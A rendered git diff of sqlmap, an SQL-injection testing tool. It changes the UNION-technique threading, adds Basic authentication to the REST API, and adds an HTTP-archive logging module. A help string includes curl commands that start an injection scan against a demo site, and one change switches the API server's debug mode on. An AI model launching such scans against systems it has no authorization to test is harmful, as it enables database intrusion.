|
||||
items = [items]
|
||||
index = None
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, items))
|
||||
else:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, None))
|
||||
if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta:
|
||||
_ = ','.join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items
|
||||
status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_))
|
||||
|
||||
items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter)
|
||||
if len(status) > width:
|
||||
status = "%s..." % status[:width - 3]
|
||||
|
||||
while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH):
|
||||
threadData.shared.lastFlushed, _ = threadData.shared.buffered[0]
|
||||
if not isNoneValue(_):
|
||||
threadData.shared.value.extend(arrayizeValue(_))
|
||||
del threadData.shared.buffered[0]
|
||||
dataToStdout("%s\n" % status)
|
||||
|
||||
if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta:
|
||||
_ = ','.join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items
|
||||
status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_))
|
||||
runThreads(numThreads, unionThread)
|
||||
|
||||
if len(status) > width:
|
||||
status = "%s..." % status[:width - 3]
|
||||
if conf.verbose == 1:
|
||||
clearConsoleLine(True)
|
||||
|
||||
dataToStdout("%s\n" % status)
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
|
||||
runThreads(numThreads, unionThread)
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if conf.verbose == 1:
|
||||
clearConsoleLine(True)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
finally:
|
||||
for _ in sorted(threadData.shared.buffered):
|
||||
if not isNoneValue(_[1]):
|
||||
threadData.shared.value.extend(arrayizeValue(_[1]))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
finally:
|
||||
for _ in sorted(threadData.shared.buffered):
|
||||
if not isNoneValue(_[1]):
|
||||
threadData.shared.value.extend(arrayizeValue(_[1]))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
|
||||
if not value and not abortedFlag:
|
||||
output = _oneShotUnionUse(expression, unpack)
|
||||
|
||||
150
lib/utils/api.py
150
lib/utils/api.py
@@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import contextlib
|
||||
import httplib
|
||||
import logging
|
||||
import os
|
||||
import re
|
||||
@@ -43,6 +44,7 @@ from lib.core.settings import RESTAPI_DEFAULT_ADDRESS
|
||||
from lib.core.settings import RESTAPI_DEFAULT_PORT
|
||||
from lib.core.subprocessng import Popen
|
||||
from lib.parse.cmdline import cmdLineParser
|
||||
from thirdparty.bottle.bottle import abort
|
||||
from thirdparty.bottle.bottle import error as return_error
|
||||
from thirdparty.bottle.bottle import get
|
||||
from thirdparty.bottle.bottle import hook
|
||||
@@ -52,13 +54,13 @@ from thirdparty.bottle.bottle import response
|
||||
from thirdparty.bottle.bottle import run
|
||||
from thirdparty.bottle.bottle import server_names
|
||||
|
||||
|
||||
# global settings
|
||||
# Global data storage
|
||||
class DataStore(object):
|
||||
admin_id = ""
|
||||
current_db = None
|
||||
tasks = dict()
|
||||
|
||||
username = None
|
||||
password = None
|
||||
|
||||
# API objects
|
||||
class Database(object):
|
||||
@@ -70,7 +72,7 @@ class Database(object):
|
||||
self.cursor = None
|
||||
|
||||
def connect(self, who="server"):
|
||||
self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None)
|
||||
self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None, check_same_thread=False)
|
||||
self.cursor = self.connection.cursor()
|
||||
logger.debug("REST-JSON API %s connected to IPC database" % who)
|
||||
|
||||
@@ -118,7 +120,6 @@ class Database(object):
|
||||
"taskid INTEGER, error TEXT"
|
||||
")")
|
||||
|
||||
|
||||
class Task(object):
|
||||
def __init__(self, taskid, remote_addr):
|
||||
self.remote_addr = remote_addr
|
||||
@@ -232,34 +233,26 @@ class StdDbOut(object):
|
||||
# Ignore all non-relevant messages
|
||||
return
|
||||
|
||||
output = conf.databaseCursor.execute(
|
||||
"SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?",
|
||||
(self.taskid, content_type))
|
||||
output = conf.databaseCursor.execute("SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", (self.taskid, content_type))
|
||||
|
||||
# Delete partial output from IPC database if we have got a complete output
|
||||
if status == CONTENT_STATUS.COMPLETE:
|
||||
if len(output) > 0:
|
||||
for index in xrange(len(output)):
|
||||
conf.databaseCursor.execute("DELETE FROM data WHERE id = ?",
|
||||
(output[index][0],))
|
||||
conf.databaseCursor.execute("DELETE FROM data WHERE id = ?", (output[index][0],))
|
||||
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
|
||||
(self.taskid, status, content_type, jsonize(value)))
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value)))
|
||||
if kb.partRun:
|
||||
kb.partRun = None
|
||||
|
||||
elif status == CONTENT_STATUS.IN_PROGRESS:
|
||||
if len(output) == 0:
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
|
||||
(self.taskid, status, content_type,
|
||||
jsonize(value)))
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value)))
|
||||
else:
|
||||
new_value = "%s%s" % (dejsonize(output[0][2]), value)
|
||||
conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?",
|
||||
(jsonize(new_value), output[0][0]))
|
||||
conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?", (jsonize(new_value), output[0][0]))
|
||||
else:
|
||||
conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)",
|
||||
(self.taskid, str(value) if value else ""))
|
||||
conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", (self.taskid, str(value) if value else ""))
|
||||
|
||||
def flush(self):
|
||||
pass
|
||||
@@ -270,17 +263,13 @@ class StdDbOut(object):
|
||||
def seek(self):
|
||||
pass
|
||||
|
||||
|
||||
class LogRecorder(logging.StreamHandler):
|
||||
def emit(self, record):
|
||||
"""
|
||||
Record emitted events to IPC database for asynchronous I/O
|
||||
communication with the parent process
|
||||
"""
|
||||
conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)",
|
||||
(conf.taskid, time.strftime("%X"), record.levelname,
|
||||
record.msg % record.args if record.args else record.msg))
|
||||
|
||||
conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", (conf.taskid, time.strftime("%X"), record.levelname, record.msg % record.args if record.args else record.msg))
|
||||
|
||||
def setRestAPILog():
|
||||
if conf.api:
|
||||
@@ -295,11 +284,32 @@ def setRestAPILog():
|
||||
LOGGER_RECORDER = LogRecorder()
|
||||
logger.addHandler(LOGGER_RECORDER)
|
||||
|
||||
|
||||
# Generic functions
|
||||
def is_admin(taskid):
|
||||
return DataStore.admin_id == taskid
|
||||
|
||||
@hook('before_request')
|
||||
def check_authentication():
|
||||
if not any((DataStore.username, DataStore.password)):
|
||||
return
|
||||
|
||||
authorization = request.headers.get("Authorization", "")
|
||||
match = re.search(r"(?i)\ABasic\s+([^\s]+)", authorization)
|
||||
|
||||
if not match:
|
||||
request.environ["PATH_INFO"] = "/error/401"
|
||||
|
||||
try:
|
||||
creds = match.group(1).decode("base64")
|
||||
except:
|
||||
request.environ["PATH_INFO"] = "/error/401"
|
||||
else:
|
||||
if creds.count(':') != 1:
|
||||
request.environ["PATH_INFO"] = "/error/401"
|
||||
else:
|
||||
username, password = creds.split(':')
|
||||
if username.strip() != (DataStore.username or "") or password.strip() != (DataStore.password or ""):
|
||||
request.environ["PATH_INFO"] = "/error/401"
|
||||
|
||||
@hook("after_request")
|
||||
def security_headers(json_header=True):
|
||||
@@ -313,6 +323,7 @@ def security_headers(json_header=True):
|
||||
response.headers["Pragma"] = "no-cache"
|
||||
response.headers["Cache-Control"] = "no-cache"
|
||||
response.headers["Expires"] = "0"
|
||||
|
||||
if json_header:
|
||||
response.content_type = "application/json; charset=UTF-8"
|
||||
|
||||
@@ -320,35 +331,39 @@ def security_headers(json_header=True):
|
||||
# HTTP Status Code functions #
|
||||
##############################
|
||||
|
||||
|
||||
@return_error(401) # Access Denied
|
||||
def error401(error=None):
|
||||
security_headers(False)
|
||||
return "Access denied"
|
||||
|
||||
|
||||
@return_error(404) # Not Found
|
||||
def error404(error=None):
|
||||
security_headers(False)
|
||||
return "Nothing here"
|
||||
|
||||
|
||||
@return_error(405) # Method Not Allowed (e.g. when requesting a POST method via GET)
|
||||
def error405(error=None):
|
||||
security_headers(False)
|
||||
return "Method not allowed"
|
||||
|
||||
|
||||
@return_error(500) # Internal Server Error
|
||||
def error500(error=None):
|
||||
security_headers(False)
|
||||
return "Internal server error"
|
||||
|
||||
#############
|
||||
# Auxiliary #
|
||||
#############
|
||||
|
||||
@get('/error/401')
|
||||
def path_401():
|
||||
response.status = 401
|
||||
return response
|
||||
|
||||
#############################
|
||||
# Task management functions #
|
||||
#############################
|
||||
|
||||
|
||||
# Users' methods
|
||||
@get("/task/new")
|
||||
def task_new():
|
||||
@@ -363,7 +378,6 @@ def task_new():
|
||||
logger.debug("Created new task: '%s'" % taskid)
|
||||
return jsonize({"success": True, "taskid": taskid})
|
||||
|
||||
|
||||
@get("/task/<taskid>/delete")
|
||||
def task_delete(taskid):
|
||||
"""
|
||||
@@ -382,7 +396,6 @@ def task_delete(taskid):
|
||||
# Admin functions #
|
||||
###################
|
||||
|
||||
|
||||
@get("/admin/<taskid>/list")
|
||||
def task_list(taskid=None):
|
||||
"""
|
||||
@@ -415,7 +428,6 @@ def task_flush(taskid):
|
||||
# sqlmap core interact functions #
|
||||
##################################
|
||||
|
||||
|
||||
# Handle task's options
|
||||
@get("/option/<taskid>/list")
|
||||
def option_list(taskid):
|
||||
@@ -429,7 +441,6 @@ def option_list(taskid):
|
||||
logger.debug("[%s] Listed task options" % taskid)
|
||||
return jsonize({"success": True, "options": DataStore.tasks[taskid].get_options()})
|
||||
|
||||
|
||||
@post("/option/<taskid>/get")
|
||||
def option_get(taskid):
|
||||
"""
|
||||
@@ -448,33 +459,41 @@ def option_get(taskid):
|
||||
logger.debug("[%s] Requested value for unknown option %s" % (taskid, option))
|
||||
return jsonize({"success": False, "message": "Unknown option", option: "not set"})
|
||||
|
||||
|
||||
@post("/option/<taskid>/set")
|
||||
def option_set(taskid):
|
||||
"""
|
||||
Set an option (command line switch) for a certain task ID
|
||||
"""
|
||||
|
||||
if taskid not in DataStore.tasks:
|
||||
logger.warning("[%s] Invalid task ID provided to option_set()" % taskid)
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
|
||||
if request.json is None:
|
||||
logger.warning("[%s] Invalid JSON options provided to option_set()" % taskid)
|
||||
return jsonize({"success": False, "message": "Invalid JSON options"})
|
||||
|
||||
for option, value in request.json.items():
|
||||
DataStore.tasks[taskid].set_option(option, value)
|
||||
|
||||
logger.debug("[%s] Requested to set options" % taskid)
|
||||
return jsonize({"success": True})
|
||||
|
||||
|
||||
# Handle scans
|
||||
@post("/scan/<taskid>/start")
|
||||
def scan_start(taskid):
|
||||
"""
|
||||
Launch a scan
|
||||
"""
|
||||
|
||||
if taskid not in DataStore.tasks:
|
||||
logger.warning("[%s] Invalid task ID provided to scan_start()" % taskid)
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
|
||||
if request.json is None:
|
||||
logger.warning("[%s] Invalid JSON options provided to scan_start()" % taskid)
|
||||
return jsonize({"success": False, "message": "Invalid JSON options"})
|
||||
|
||||
# Initialize sqlmap engine's options with user's provided options, if any
|
||||
for option, value in request.json.items():
|
||||
DataStore.tasks[taskid].set_option(option, value)
|
||||
@@ -485,12 +504,12 @@ def scan_start(taskid):
|
||||
logger.debug("[%s] Started scan" % taskid)
|
||||
return jsonize({"success": True, "engineid": DataStore.tasks[taskid].engine_get_id()})
|
||||
|
||||
|
||||
@get("/scan/<taskid>/stop")
|
||||
def scan_stop(taskid):
|
||||
"""
|
||||
Stop a scan
|
||||
"""
|
||||
|
||||
if (taskid not in DataStore.tasks or
|
||||
DataStore.tasks[taskid].engine_process() is None or
|
||||
DataStore.tasks[taskid].engine_has_terminated()):
|
||||
@@ -502,12 +521,12 @@ def scan_stop(taskid):
|
||||
logger.debug("[%s] Stopped scan" % taskid)
|
||||
return jsonize({"success": True})
|
||||
|
||||
|
||||
@get("/scan/<taskid>/kill")
|
||||
def scan_kill(taskid):
|
||||
"""
|
||||
Kill a scan
|
||||
"""
|
||||
|
||||
if (taskid not in DataStore.tasks or
|
||||
DataStore.tasks[taskid].engine_process() is None or
|
||||
DataStore.tasks[taskid].engine_has_terminated()):
|
||||
@@ -519,12 +538,12 @@ def scan_kill(taskid):
|
||||
logger.debug("[%s] Killed scan" % taskid)
|
||||
return jsonize({"success": True})
|
||||
|
||||
|
||||
@get("/scan/<taskid>/status")
|
||||
def scan_status(taskid):
|
||||
"""
|
||||
Returns status of a scan
|
||||
"""
|
||||
|
||||
if taskid not in DataStore.tasks:
|
||||
logger.warning("[%s] Invalid task ID provided to scan_status()" % taskid)
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
@@ -541,12 +560,12 @@ def scan_status(taskid):
|
||||
"returncode": DataStore.tasks[taskid].engine_get_returncode()
|
||||
})
|
||||
|
||||
|
||||
@get("/scan/<taskid>/data")
|
||||
def scan_data(taskid):
|
||||
"""
|
||||
Retrieve the data of a scan
|
||||
"""
|
||||
|
||||
json_data_message = list()
|
||||
json_errors_message = list()
|
||||
|
||||
@@ -555,16 +574,11 @@ def scan_data(taskid):
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
|
||||
# Read all data from the IPC database for the taskid
|
||||
for status, content_type, value in DataStore.current_db.execute(
|
||||
"SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC",
|
||||
(taskid,)):
|
||||
json_data_message.append(
|
||||
{"status": status, "type": content_type, "value": dejsonize(value)})
|
||||
for status, content_type, value in DataStore.current_db.execute("SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", (taskid,)):
|
||||
json_data_message.append({"status": status, "type": content_type, "value": dejsonize(value)})
|
||||
|
||||
# Read all error messages from the IPC database
|
||||
for error in DataStore.current_db.execute(
|
||||
"SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC",
|
||||
(taskid,)):
|
||||
for error in DataStore.current_db.execute("SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)):
|
||||
json_errors_message.append(error)
|
||||
|
||||
logger.debug("[%s] Retrieved scan data and error messages" % taskid)
|
||||
@@ -577,6 +591,7 @@ def scan_log_limited(taskid, start, end):
|
||||
"""
|
||||
Retrieve a subset of log messages
|
||||
"""
|
||||
|
||||
json_log_messages = list()
|
||||
|
||||
if taskid not in DataStore.tasks:
|
||||
@@ -591,10 +606,7 @@ def scan_log_limited(taskid, start, end):
|
||||
end = max(1, int(end))
|
||||
|
||||
# Read a subset of log messages from the IPC database
|
||||
for time_, level, message in DataStore.current_db.execute(
|
||||
("SELECT time, level, message FROM logs WHERE "
|
||||
"taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC"),
|
||||
(taskid, start, end)):
|
||||
for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC", (taskid, start, end)):
|
||||
json_log_messages.append({"time": time_, "level": level, "message": message})
|
||||
|
||||
logger.debug("[%s] Retrieved scan log messages subset" % taskid)
|
||||
@@ -606,6 +618,7 @@ def scan_log(taskid):
|
||||
"""
|
||||
Retrieve the log messages
|
||||
"""
|
||||
|
||||
json_log_messages = list()
|
||||
|
||||
if taskid not in DataStore.tasks:
|
||||
@@ -613,8 +626,7 @@ def scan_log(taskid):
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
|
||||
# Read all log messages from the IPC database
|
||||
for time_, level, message in DataStore.current_db.execute(
|
||||
"SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)):
|
||||
for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)):
|
||||
json_log_messages.append({"time": time_, "level": level, "message": message})
|
||||
|
||||
logger.debug("[%s] Retrieved scan log messages" % taskid)
|
||||
@@ -627,6 +639,7 @@ def download(taskid, target, filename):
|
||||
"""
|
||||
Download a certain file from the file system
|
||||
"""
|
||||
|
||||
if taskid not in DataStore.tasks:
|
||||
logger.warning("[%s] Invalid task ID provided to download()" % taskid)
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
@@ -647,13 +660,17 @@ def download(taskid, target, filename):
|
||||
return jsonize({"success": False, "message": "File does not exist"})
|
||||
|
||||
|
||||
def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER):
|
||||
def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER, username=None, password=None):
|
||||
"""
|
||||
REST-JSON API server
|
||||
"""
|
||||
|
||||
DataStore.admin_id = hexencode(os.urandom(16))
|
||||
handle, Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False)
|
||||
os.close(handle)
|
||||
DataStore.username = username
|
||||
DataStore.password = password
|
||||
|
||||
_, Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False)
|
||||
os.close(_)
|
||||
|
||||
if port == 0: # random
|
||||
with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
|
||||
@@ -681,7 +698,7 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST
|
||||
import eventlet
|
||||
eventlet.monkey_patch()
|
||||
logger.debug("Using adapter '%s' to run bottle" % adapter)
|
||||
run(host=host, port=port, quiet=True, debug=False, server=adapter)
|
||||
run(host=host, port=port, quiet=True, debug=True, server=adapter)
|
||||
except socket.error, ex:
|
||||
if "already in use" in getSafeExString(ex):
|
||||
logger.error("Address already in use ('%s:%s')" % (host, port))
|
||||
@@ -702,7 +719,12 @@ def _client(url, options=None):
|
||||
data = None
|
||||
if options is not None:
|
||||
data = jsonize(options)
|
||||
req = urllib2.Request(url, data, {"Content-Type": "application/json"})
|
||||
headers = {"Content-Type": "application/json"}
|
||||
|
||||
if DataStore.username or DataStore.password:
|
||||
headers["Authorization"] = "Basic %s" % ("%s:%s" % (DataStore.username or "", DataStore.password or "")).encode("base64").strip()
|
||||
|
||||
req = urllib2.Request(url, data, headers)
|
||||
response = urllib2.urlopen(req)
|
||||
text = response.read()
|
||||
except:
|
||||
@@ -711,12 +733,14 @@ def _client(url, options=None):
|
||||
raise
|
||||
return text
|
||||
|
||||
|
||||
def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT):
|
||||
def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=None, password=None):
|
||||
"""
|
||||
REST-JSON API client
|
||||
"""
|
||||
|
||||
DataStore.username = username
|
||||
DataStore.password = password
|
||||
|
||||
dbgMsg = "Example client access from command line:"
|
||||
dbgMsg += "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid" % (host, port)
|
||||
dbgMsg += "\n\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/$taskid/start" % (host, port)
|
||||
@@ -730,7 +754,7 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT):
|
||||
try:
|
||||
_client(addr)
|
||||
except Exception, ex:
|
||||
if not isinstance(ex, urllib2.HTTPError):
|
||||
if not isinstance(ex, urllib2.HTTPError) or ex.code == httplib.UNAUTHORIZED:
|
||||
errMsg = "There has been a problem while connecting to the "
|
||||
errMsg += "REST-JSON API server at '%s' " % addr
|
||||
errMsg += "(%s)" % ex
|
||||
@@ -757,7 +781,7 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT):
|
||||
if not res["success"]:
|
||||
logger.error("Failed to execute command %s" % command)
|
||||
dataToStdout("%s\n" % raw)
|
||||
|
||||
|
||||
elif command.startswith("option"):
|
||||
if not taskid:
|
||||
logger.error("No task ID in use")
|
||||
|
||||
@@ -112,10 +112,10 @@ def crawl(target):
|
||||
threadData.shared.deeper.add(url)
|
||||
if re.search(r"(.*?)\?(.+)", url):
|
||||
threadData.shared.value.add(url)
|
||||
except ValueError: # for non-valid links
|
||||
pass
|
||||
except UnicodeEncodeError: # for non-HTML files
|
||||
pass
|
||||
except ValueError: # for non-valid links
|
||||
pass
|
||||
finally:
|
||||
if conf.forms:
|
||||
findPageForms(content, current, False, True)
|
||||
|
||||
229
lib/utils/har.py
Normal file
229
lib/utils/har.py
Normal file
@@ -0,0 +1,229 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import base64
|
||||
import BaseHTTPServer
|
||||
import datetime
|
||||
import httplib
|
||||
import re
|
||||
import StringIO
|
||||
import time
|
||||
|
||||
from lib.core.bigarray import BigArray
|
||||
from lib.core.settings import VERSION
|
||||
|
||||
# Reference: https://dvcs.w3.org/hg/webperf/raw-file/tip/specs/HAR/Overview.html
|
||||
# http://www.softwareishard.com/har/viewer/
|
||||
|
||||
class HTTPCollectorFactory:
|
||||
def __init__(self, harFile=False):
|
||||
self.harFile = harFile
|
||||
|
||||
def create(self):
|
||||
return HTTPCollector()
|
||||
|
||||
class HTTPCollector:
|
||||
def __init__(self):
|
||||
self.messages = BigArray()
|
||||
self.extendedArguments = {}
|
||||
|
||||
def setExtendedArguments(self, arguments):
|
||||
self.extendedArguments = arguments
|
||||
|
||||
def collectRequest(self, requestMessage, responseMessage, startTime=None, endTime=None):
|
||||
self.messages.append(RawPair(requestMessage, responseMessage,
|
||||
startTime=startTime, endTime=endTime,
|
||||
extendedArguments=self.extendedArguments))
|
||||
|
||||
def obtain(self):
|
||||
return {"log": {
|
||||
"version": "1.2",
|
||||
"creator": {"name": "sqlmap", "version": VERSION},
|
||||
"entries": [pair.toEntry().toDict() for pair in self.messages],
|
||||
}}
|
||||
|
||||
class RawPair:
|
||||
def __init__(self, request, response, startTime=None, endTime=None, extendedArguments=None):
|
||||
self.request = request
|
||||
self.response = response
|
||||
self.startTime = startTime
|
||||
self.endTime = endTime
|
||||
self.extendedArguments = extendedArguments or {}
|
||||
|
||||
def toEntry(self):
|
||||
return Entry(request=Request.parse(self.request), response=Response.parse(self.response),
|
||||
startTime=self.startTime, endTime=self.endTime,
|
||||
extendedArguments=self.extendedArguments)
|
||||
|
||||
class Entry:
|
||||
def __init__(self, request, response, startTime, endTime, extendedArguments):
|
||||
self.request = request
|
||||
self.response = response
|
||||
self.startTime = startTime or 0
|
||||
self.endTime = endTime or 0
|
||||
self.extendedArguments = extendedArguments
|
||||
|
||||
def toDict(self):
|
||||
out = {
|
||||
"request": self.request.toDict(),
|
||||
"response": self.response.toDict(),
|
||||
"cache": {},
|
||||
"timings": {
|
||||
"send": -1,
|
||||
"wait": -1,
|
||||
"receive": -1,
|
||||
},
|
||||
"time": int(1000 * (self.endTime - self.startTime)),
|
||||
"startedDateTime": "%s%s" % (datetime.datetime.fromtimestamp(self.startTime).isoformat(), time.strftime("%z")) if self.startTime else None
|
||||
}
|
||||
out.update(self.extendedArguments)
|
||||
return out
|
||||
|
||||
class Request:
|
||||
def __init__(self, method, path, httpVersion, headers, postBody=None, raw=None, comment=None):
|
||||
self.method = method
|
||||
self.path = path
|
||||
self.httpVersion = httpVersion
|
||||
self.headers = headers or {}
|
||||
self.postBody = postBody
|
||||
self.comment = comment.strip() if comment else comment
|
||||
self.raw = raw
|
||||
|
||||
@classmethod
|
||||
def parse(cls, raw):
|
||||
request = HTTPRequest(raw)
|
||||
return cls(method=request.command,
|
||||
path=request.path,
|
||||
httpVersion=request.request_version,
|
||||
headers=request.headers,
|
||||
postBody=request.rfile.read(),
|
||||
comment=request.comment,
|
||||
raw=raw)
|
||||
|
||||
@property
|
||||
def url(self):
|
||||
host = self.headers.get("Host", "unknown")
|
||||
return "http://%s%s" % (host, self.path)
|
||||
|
||||
def toDict(self):
|
||||
out = {
|
||||
"httpVersion": self.httpVersion,
|
||||
"method": self.method,
|
||||
"url": self.url,
|
||||
"headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items()],
|
||||
"cookies": [],
|
||||
"queryString": [],
|
||||
"headersSize": -1,
|
||||
"bodySize": -1,
|
||||
"comment": self.comment,
|
||||
}
|
||||
|
||||
if self.postBody:
|
||||
contentType = self.headers.get("Content-Type")
|
||||
out["postData"] = {
|
||||
"mimeType": contentType,
|
||||
"text": self.postBody.rstrip("\r\n"),
|
||||
}
|
||||
|
||||
return out
|
||||
|
||||
class Response:
|
||||
extract_status = re.compile(r'\((\d{3}) (.*)\)')
|
||||
|
||||
def __init__(self, httpVersion, status, statusText, headers, content, raw=None, comment=None):
|
||||
self.raw = raw
|
||||
self.httpVersion = httpVersion
|
||||
self.status = status
|
||||
self.statusText = statusText
|
||||
self.headers = headers
|
||||
self.content = content
|
||||
self.comment = comment.strip() if comment else comment
|
||||
|
||||
@classmethod
|
||||
def parse(cls, raw):
|
||||
altered = raw
|
||||
comment = ""
|
||||
|
||||
if altered.startswith("HTTP response [") or altered.startswith("HTTP redirect ["):
|
||||
io = StringIO.StringIO(raw)
|
||||
first_line = io.readline()
|
||||
parts = cls.extract_status.search(first_line)
|
||||
status_line = "HTTP/1.0 %s %s" % (parts.group(1), parts.group(2))
|
||||
remain = io.read()
|
||||
altered = status_line + "\r\n" + remain
|
||||
comment = first_line
|
||||
|
||||
response = httplib.HTTPResponse(FakeSocket(altered))
|
||||
response.begin()
|
||||
|
||||
try:
|
||||
content = response.read(-1)
|
||||
except httplib.IncompleteRead:
|
||||
content = raw[raw.find("\r\n\r\n") + 4:].rstrip("\r\n")
|
||||
|
||||
return cls(httpVersion="HTTP/1.1" if response.version == 11 else "HTTP/1.0",
|
||||
status=response.status,
|
||||
statusText=response.reason,
|
||||
headers=response.msg,
|
||||
content=content,
|
||||
comment=comment,
|
||||
raw=raw)
|
||||
|
||||
def toDict(self):
|
||||
content = {
|
||||
"mimeType": self.headers.get("Content-Type"),
|
||||
"text": self.content,
|
||||
"size": len(self.content or "")
|
||||
}
|
||||
|
||||
binary = set(['\0', '\1'])
|
||||
if any(c in binary for c in self.content):
|
||||
content["encoding"] = "base64"
|
||||
content["text"] = base64.b64encode(self.content)
|
||||
|
||||
return {
|
||||
"httpVersion": self.httpVersion,
|
||||
"status": self.status,
|
||||
"statusText": self.statusText,
|
||||
"headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items() if key.lower() != "uri"],
|
||||
"cookies": [],
|
||||
"content": content,
|
||||
"headersSize": -1,
|
||||
"bodySize": -1,
|
||||
"redirectURL": "",
|
||||
"comment": self.comment,
|
||||
}
|
||||
|
||||
class FakeSocket:
|
||||
# Original source:
|
||||
# https://stackoverflow.com/questions/24728088/python-parse-http-response-string
|
||||
|
||||
def __init__(self, response_text):
|
||||
self._file = StringIO.StringIO(response_text)
|
||||
|
||||
def makefile(self, *args, **kwargs):
|
||||
return self._file
|
||||
|
||||
class HTTPRequest(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||
# Original source:
|
||||
# https://stackoverflow.com/questions/4685217/parse-raw-http-headers
|
||||
|
||||
def __init__(self, request_text):
|
||||
self.comment = None
|
||||
self.rfile = StringIO.StringIO(request_text)
|
||||
self.raw_requestline = self.rfile.readline()
|
||||
|
||||
if self.raw_requestline.startswith("HTTP request ["):
|
||||
self.comment = self.raw_requestline
|
||||
self.raw_requestline = self.rfile.readline()
|
||||
|
||||
self.error_code = self.error_message = None
|
||||
self.parse_request()
|
||||
|
||||
def send_error(self, code, message):
|
||||
